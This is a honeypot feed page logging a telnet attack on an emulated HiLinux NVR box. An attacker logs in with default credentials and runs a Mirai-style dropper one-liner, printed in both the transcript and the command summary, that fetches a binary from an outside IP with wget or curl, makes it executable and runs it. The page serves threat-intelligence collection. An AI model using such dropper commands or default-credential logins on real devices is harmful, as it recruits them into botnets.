HoneyMire Hub

Attack #6326 telnet

Captured 2026-05-11 19:18:17Z by Ka on honeypot HoneyMistNano 🟡 C3 SuperMini · firmware 1.

Source175.167.86.226:50449
Authenticatedyes
Commands11
Duration8.5s

Session recording

Loading session…

Transcript

Server output and attacker input as captured, line-grain. The asciicast above is the cinematic version of the same data; everything below is the raw conversation. Captured credentials live in the Credentials card; this transcript starts where the shell session does.


Welcome to HiLinux (NVR Box)

hilinux-nvrbox login: admin

Password: pass

BusyBox v1.20.2 (2015-04-01 10:23:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

hilinux-nvrbox# start
sh: start: not found
hilinux-nvrbox# enable
sh: enable: not found
hilinux-nvrbox# config terminal
sh: config: not found
hilinux-nvrbox# system
sh: system: not found
hilinux-nvrbox# linuxshell
sh: linuxshell: not found
hilinux-nvrbox# su
sh: su: not found
hilinux-nvrbox# shell
sh: shell: not found
hilinux-nvrbox# sh
hilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x49\x47\x50\x50\x46\x45'
cd: can't cd to /usr: No such file or directory
IGPPFE
hilinux-nvrbox# /bin/busybox wget;/bin/busybox echo -ne '\x49\x47\x50\x50\x46\x45'
BusyBox v1.20.2 (2015-04-01 10:23:44 CST) multi-call binary.

Usage: wget [-cq] [-O FILE] [--header 'HEADER: VALUE'] URL
IGPPFEhilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://123.129.39.253:43067/i ||curl -O http://123.129.39.253:43067/i ||/bin/busybox wget http://123.129.39.253:43067/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x48\x41\x41\x41\x45\x4d\x52'
cd: can't cd to /usr: No such file or directory
Connecting to http://123.129.39.253:43067/i
Connecting to http://123.129.39.253:43067/i (45.207.70.41:30700)
saving to STDOUT

            0K .......... 100%  1234K=0.1s

2025-01-09 00:56:19 (1234 KB/s) - saved [1234567]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  1234K  100  1234K    0     0   1234K      0  0:00:01 --:--:--  0:00:01 1234K
Connecting to http://123.129.39.253:43067/i
Connecting to http://123.129.39.253:43067/i (255.63.43.241:55108)
saving to STDOUT

            0K .......... 100%  1234K=0.1s

2025-06-27 06:29:32 (1234 KB/s) - saved [1234567]
sh: (cp: not found
cat: i>ii: No such file or directory
sh: ./i: not found
FHAAAEMR
hilinux-nvrbox# 

Credentials

Username: admin

Password: pass

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇨🇳China · Liaoning · Shenyang

China Unicom Liaoning Province Network · AS4837 CHINA UNICOM China169 Backbone · 41.78,123.43

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x49\x47\x50\x50\x46\x45'
/bin/busybox wget;/bin/busybox echo -ne '\x49\x47\x50\x50\x46\x45'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://123.129.39.253:43067/i ||curl -O http://123.129.39.253:43067/i ||/bin/busybox wget http://123.129.39.253:43067/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x48\x41\x41\x41\x45\x4d\x52'

Reported to threat intel

none

HoneyMire Hub · open feed: / · API: /api · docs: /docs · about: /about · firmware: github.com/KaSt/HoneyMire